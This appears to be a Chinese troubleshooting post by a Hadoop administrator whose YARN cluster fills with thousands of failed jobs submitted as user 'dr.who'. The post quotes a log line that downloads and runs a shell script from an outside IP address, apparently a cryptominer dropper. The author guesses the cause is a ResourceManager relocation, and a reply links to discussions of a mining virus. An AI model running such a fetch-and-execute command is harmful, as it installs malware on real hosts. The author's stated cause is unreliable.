這幾天集群任務不停的增長,並且不是業務提交的任務,最后全部執行失敗,提交的用戶全部是"dr.who"
Total number of applications (application-types: [] and states: [SUBMITTED, ACCEPTED, RUNNING]):6463
Application-Id Application-Name Application-Type User Queue State Final-State Progress Tracking-URL
application_1527846395871_0653 hadoop YARN dr.who default ACCEPTED UNDEFINED 0% N/A
查看日志:
初始化容器時腳本執行超時
exec /bin/bash -c "wget -q -O - 185.222.210.59/x_wcr.sh | sh & disown"
具體原理暫時不清楚,但是知道了問題出現的誘因是把resourcemaanger從node1移動到master導致的,再移到node1里就好了
------2018.08.31更新,感謝OrisonChan的回復--------
1樓 2018-08-18 22:41 | OrisonChan
https://community.hortonworks.com/questions/189402/why-are-there-drwho-myyarn-applications-running-an.html?childToView=210491#answer-210491
和
https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html